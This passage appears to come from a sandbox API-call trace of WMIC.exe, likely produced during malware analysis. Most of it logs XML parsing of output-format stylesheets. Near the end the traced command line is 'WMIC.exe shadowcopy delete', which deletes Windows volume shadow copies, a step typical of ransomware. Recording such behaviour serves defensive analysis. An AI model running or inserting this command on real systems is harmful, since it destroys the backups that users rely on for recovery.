varVal2=0x60070001c)) returned 0x0 [0043.358] malloc (_Size=0x18) returned 0x4091e0 [0043.358] malloc (_Size=0x18) returned 0x409200 [0043.358] SysStringLen (param_1="MOF") returned 0x3 [0043.358] SysStringLen (param_1="TABLE") returned 0x5 [0043.358] SysStringLen (param_1="MOF") returned 0x3 [0043.358] SysStringLen (param_1="LIST") returned 0x4 [0043.358] SysStringLen (param_1="MOF") returned 0x3 [0043.358] SysStringLen (param_1="RAWXML") returned 0x6 [0043.358] SysStringLen (param_1="LIST") returned 0x4 [0043.358] SysStringLen (param_1="MOF") returned 0x3 [0043.358] malloc (_Size=0x30) returned 0x408240 [0043.358] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.358] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.358] IUnknown:Release (This=0x229a280) returned 0x0 [0043.358] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=8, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.358] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="csv.xsl") returned 0x0 [0043.358] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.358] malloc (_Size=0x18) returned 0x409220 [0043.358] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.358] free (_Block=0x409220) [0043.358] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x60070001c)) returned 0x0 [0043.358] malloc (_Size=0x18) returned 0x409220 [0043.358] malloc (_Size=0x18) returned 0x409240 [0043.358] SysStringLen (param_1="CSV") returned 0x3 [0043.358] SysStringLen (param_1="TABLE") returned 0x5 [0043.358] SysStringLen (param_1="CSV") returned 0x3 [0043.358] SysStringLen (param_1="LIST") returned 0x4 [0043.358] SysStringLen (param_1="CSV") returned 0x3 [0043.358] SysStringLen (param_1="HTABLE") returned 0x6 [0043.359] SysStringLen (param_1="CSV") returned 0x3 [0043.359] SysStringLen (param_1="HFORM") returned 0x5 [0043.359] malloc (_Size=0x30) returned 0x408280 [0043.359] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.359] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.359] IUnknown:Release (This=0x229a280) returned 0x0 [0043.359] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=9, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.359] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.359] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.359] malloc (_Size=0x18) returned 0x409260 [0043.359] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.359] free (_Block=0x409260) [0043.359] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x60070001c)) returned 0x0 [0043.359] malloc (_Size=0x18) returned 0x409260 [0043.359] malloc (_Size=0x18) returned 0x409280 [0043.359] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.359] SysStringLen (param_1="TABLE") returned 0x5 [0043.359] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.359] SysStringLen (param_1="VALUE") returned 0x5 [0043.359] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.359] SysStringLen (param_1="XML") returned 0x3 [0043.359] SysStringLen (param_1="XML") returned 0x3 [0043.359] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.359] malloc (_Size=0x30) returned 0x4082c0 [0043.359] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.359] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.359] IUnknown:Release (This=0x229a280) returned 0x0 [0043.359] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=10, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.360] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.360] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.360] malloc (_Size=0x18) returned 0x4092a0 [0043.360] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.360] free (_Block=0x4092a0) [0043.360] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x60070001c)) returned 0x0 [0043.360] malloc (_Size=0x18) returned 0x4092a0 [0043.360] malloc (_Size=0x18) returned 0x4092c0 [0043.360] SysStringLen (param_1="texttablewsys") returned 0xd [0043.360] SysStringLen (param_1="TABLE") returned 0x5 [0043.360] SysStringLen (param_1="texttablewsys") returned 0xd [0043.360] SysStringLen (param_1="XML") returned 0x3 [0043.360] SysStringLen (param_1="texttablewsys") returned 0xd [0043.360] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.360] SysStringLen (param_1="XML") returned 0x3 [0043.360] SysStringLen (param_1="texttablewsys") returned 0xd [0043.360] malloc (_Size=0x30) returned 0x408300 [0043.360] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.360] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.360] IUnknown:Release (This=0x229a280) returned 0x0 [0043.360] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=11, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.360] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.360] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.360] malloc (_Size=0x18) returned 0x4092e0 [0043.360] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.361] free (_Block=0x4092e0) [0043.361] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x60070001c)) returned 0x0 [0043.361] malloc (_Size=0x18) returned 0x4092e0 [0043.361] malloc (_Size=0x18) returned 0x409300 [0043.361] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.361] SysStringLen (param_1="TABLE") returned 0x5 [0043.361] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.361] SysStringLen (param_1="XML") returned 0x3 [0043.361] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.361] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.361] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.361] malloc (_Size=0x30) returned 0x408340 [0043.361] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.361] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.361] IUnknown:Release (This=0x229a280) returned 0x0 [0043.361] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=12, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.361] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.361] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.361] malloc (_Size=0x18) returned 0x409320 [0043.361] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.361] free (_Block=0x409320) [0043.361] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x60070001c)) returned 0x0 [0043.361] malloc (_Size=0x18) returned 0x409320 [0043.361] malloc (_Size=0x18) returned 0x409340 [0043.361] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.361] SysStringLen (param_1="TABLE") returned 0x5 [0043.362] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.362] SysStringLen (param_1="XML") returned 0x3 [0043.362] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.362] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.362] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.362] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.362] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.362] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.362] malloc (_Size=0x30) returned 0x408380 [0043.362] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.362] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.362] IUnknown:Release (This=0x229a280) returned 0x0 [0043.362] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=13, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.362] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.362] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.362] malloc (_Size=0x18) returned 0x409360 [0043.362] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.362] free (_Block=0x409360) [0043.362] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x60070001c)) returned 0x0 [0043.362] malloc (_Size=0x18) returned 0x409360 [0043.362] malloc (_Size=0x18) returned 0x409380 [0043.362] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.362] SysStringLen (param_1="TABLE") returned 0x5 [0043.362] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.362] SysStringLen (param_1="XML") returned 0x3 [0043.362] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.362] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.362] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.362] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.362] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.362] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.363] malloc (_Size=0x30) returned 0x4083c0 [0043.363] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.363] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.363] IUnknown:Release (This=0x229a280) returned 0x0 [0043.363] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=14, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.363] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="texttable.xsl") returned 0x0 [0043.363] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.363] malloc (_Size=0x18) returned 0x4093a0 [0043.363] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.363] free (_Block=0x4093a0) [0043.363] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x60070001c)) returned 0x0 [0043.363] malloc (_Size=0x18) returned 0x4093a0 [0043.363] malloc (_Size=0x18) returned 0x4093c0 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] SysStringLen (param_1="TABLE") returned 0x5 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] SysStringLen (param_1="XML") returned 0x3 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.363] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.363] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0043.363] malloc (_Size=0x30) returned 0x408400 [0043.363] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.363] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.363] IUnknown:Release (This=0x229a280) returned 0x0 [0043.364] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=15, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.364] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="htable.xsl") returned 0x0 [0043.364] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.364] malloc (_Size=0x18) returned 0x4093e0 [0043.364] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.364] free (_Block=0x4093e0) [0043.364] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x60070001c)) returned 0x0 [0043.364] malloc (_Size=0x18) returned 0x4093e0 [0043.364] malloc (_Size=0x18) returned 0x409400 [0043.364] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.364] SysStringLen (param_1="TABLE") returned 0x5 [0043.364] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.364] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.364] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.364] SysStringLen (param_1="XML") returned 0x3 [0043.364] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.364] SysStringLen (param_1="texttablewsys") returned 0xd [0043.364] SysStringLen (param_1="XML") returned 0x3 [0043.364] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.364] malloc (_Size=0x30) returned 0x408440 [0043.364] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.364] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.364] IUnknown:Release (This=0x229a280) returned 0x0 [0043.364] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=16, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.364] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="htable.xsl") returned 0x0 [0043.364] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.364] malloc (_Size=0x18) returned 0x409420 [0043.365] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.365] free (_Block=0x409420) [0043.365] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x60070001c)) returned 0x0 [0043.365] malloc (_Size=0x18) returned 0x409420 [0043.365] malloc (_Size=0x18) returned 0x409440 [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] SysStringLen (param_1="TABLE") returned 0x5 [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] SysStringLen (param_1="XML") returned 0x3 [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] SysStringLen (param_1="texttablewsys") returned 0xd [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0043.365] SysStringLen (param_1="XML") returned 0x3 [0043.365] SysStringLen (param_1="htable-sortby") returned 0xd [0043.365] malloc (_Size=0x30) returned 0x408480 [0043.365] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.365] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.365] IUnknown:Release (This=0x229a280) returned 0x0 [0043.365] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=17, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.365] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="mof.xsl") returned 0x0 [0043.365] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.365] malloc (_Size=0x18) returned 0x409460 [0043.365] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.365] free (_Block=0x409460) [0043.366] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x60070001c)) returned 0x0 [0043.366] malloc (_Size=0x18) returned 0x409460 [0043.366] malloc (_Size=0x18) returned 0x409480 [0043.366] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.366] SysStringLen (param_1="TABLE") returned 0x5 [0043.366] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.366] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.366] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.366] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.366] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.366] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.366] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.366] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.366] malloc (_Size=0x30) returned 0x4084c0 [0043.366] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.366] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.366] IUnknown:Release (This=0x229a280) returned 0x0 [0043.366] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=18, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.366] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="mof.xsl") returned 0x0 [0043.366] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.366] malloc (_Size=0x18) returned 0x4094a0 [0043.366] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.366] free (_Block=0x4094a0) [0043.366] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x60070001c)) returned 0x0 [0043.366] malloc (_Size=0x18) returned 0x4094a0 [0043.366] malloc (_Size=0x18) returned 0x4094c0 [0043.366] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.366] SysStringLen (param_1="TABLE") returned 0x5 [0043.367] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.367] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.367] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.367] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.367] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.367] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0043.367] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.367] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0043.367] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.367] SysStringLen (param_1="wmiclimofformat") returned 0xf [0043.367] malloc (_Size=0x30) returned 0x408500 [0043.367] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.367] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.367] IUnknown:Release (This=0x229a280) returned 0x0 [0043.367] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=19, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.367] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="textvaluelist.xsl") returned 0x0 [0043.367] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.367] malloc (_Size=0x18) returned 0x4094e0 [0043.367] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.367] free (_Block=0x4094e0) [0043.367] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x60070001c)) returned 0x0 [0043.367] malloc (_Size=0x18) returned 0x4094e0 [0043.368] malloc (_Size=0x18) returned 0x409500 [0043.368] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.368] SysStringLen (param_1="TABLE") returned 0x5 [0043.368] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.368] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.368] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.368] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.368] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.368] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.368] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.368] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.368] malloc (_Size=0x30) returned 0x408540 [0043.368] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.368] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.368] IUnknown:Release (This=0x229a280) returned 0x0 [0043.368] IXMLDOMNodeList:get_item (in: This=0x2299cc0, index=20, listItem=0xff960 | out: listItem=0xff960*=0x229bd50) returned 0x0 [0043.368] IXMLDOMNode:get_text (in: This=0x229bd50, text=0xff970 | out: text=0xff970*="textvaluelist.xsl") returned 0x0 [0043.368] IXMLDOMNode:get_attributes (in: This=0x229bd50, attributeMap=0xff968 | out: attributeMap=0xff968*=0x22978d0) returned 0x0 [0043.368] malloc (_Size=0x18) returned 0x409520 [0043.368] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22978d0, name="KEYWORD", namedItem=0xff978 | out: namedItem=0xff978*=0x229a280) returned 0x0 [0043.368] free (_Block=0x409520) [0043.368] IXMLDOMNode:get_nodeValue (in: This=0x229a280, value=0xff9b0 | out: value=0xff9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x60070001c)) returned 0x0 [0043.369] malloc (_Size=0x18) returned 0x409520 [0043.369] malloc (_Size=0x18) returned 0x409540 [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] SysStringLen (param_1="TABLE") returned 0x5 [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0043.369] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0043.369] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0043.369] malloc (_Size=0x30) returned 0x408580 [0043.369] IUnknown:Release (This=0x229bd50) returned 0x0 [0043.369] IUnknown:Release (This=0x22978d0) returned 0x0 [0043.369] IUnknown:Release (This=0x229a280) returned 0x0 [0043.369] IUnknown:Release (This=0x2299cc0) returned 0x0 [0043.369] FreeThreadedDOMDocument:IUnknown:Release (This=0x229bc50) returned 0x1 [0043.369] FreeThreadedDOMDocument:IUnknown:Release (This=0x22971d0) returned 0x0 [0043.369] free (_Block=0x409040) [0043.369] GetCommandLineW () returned="WMIC.exe shadowcopy delete " [0043.370] malloc (_Size=0x40) returned 0x406d70 [0043.370] memcpy_s (in: _Destination=0x406d70, _DestinationSize=0x3e, _Source=0x1f25be, _SourceSize=0x38 | out: _Destination=0x406d70) returned 0x0 [0043.370] malloc (_Size=0x18) returned 0x409040 [0043.370] malloc (_Size=0x18) returned 0x409560 [0043.370] malloc (_Size=0x18) returned 0x409580 [0043.371] malloc (_Size=0x18) returned 0x4095a0 [0043.371] malloc (_Size=0x80) returned 0x406e50 [0043.371] GetLocalTime (in: lpSystemTime=0xffb20 | out: lpSystemTime=0xffb20*(wYear=0x7a3, wMonth=0x3, wDayOfWeek=0x3, wDay=0x10, wHour=0x15, wMinute=0x0, wSecond=0x1, wMilliseconds=0x8a)) [0043.371] _vsnwprintf (in: _Buffer=0x406e50, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xffa78 | out: _Buffer="03-16-1955T21:00:01") returned 19 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] malloc (_Size=0x2a) returned 0x4085c0 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] malloc (_Size=0x2a) returned 0x408600 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] malloc (_Size=0x16) returned 0x4095c0 [0043.371] lstrlenW (lpString="shadowcopy") returned 10 [0043.371] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0043.371] malloc (_Size=0x16) returned 0x4095e0 [0043.371] malloc (_Size=0x8) returned 0x406dc0 [0043.371] free (_Block=0x0) [0043.371] free (_Block=0x4095c0) [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] malloc (_Size=0xe) returned 0x4095c0 [0043.371] lstrlenW (lpString="delete") returned 6 [0043.371] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0043.371] malloc (_Size=0xe) returned 0x409600 [0043.371] malloc (_Size=0x10) returned 0x409620 [0043.371] memmove_s (in: _Destination=0x409620, _DestinationSize=0x8, _Source=0x406dc0, _SourceSize=0x8 | out: _Destination=0x409620) returned 0x0 [0043.371] free (_Block=0x406dc0) [0043.371] free (_Block=0x0) [0043.371] free (_Block=0x4095c0) [0043.371] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0043.371] malloc (_Size=0x10) returned 0x4095c0 [0043.371] lstrlenW (lpString="QUIT") returned 4 [0043.371] lstrlenW (lpString="shadowcopy") returned 10 [0043.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0043.372] lstrlenW (lpString="EXIT") returned 4 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0043.372] free (_Block=0x4095c0) [0043.372] WbemLocator:IUnknown:AddRef (This=0x1e31390) returned 0x2 [0043.372] malloc (_Size=0x10) returned 0x4095c0 [0043.372] lstrlenW (lpString="/") returned 1 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW 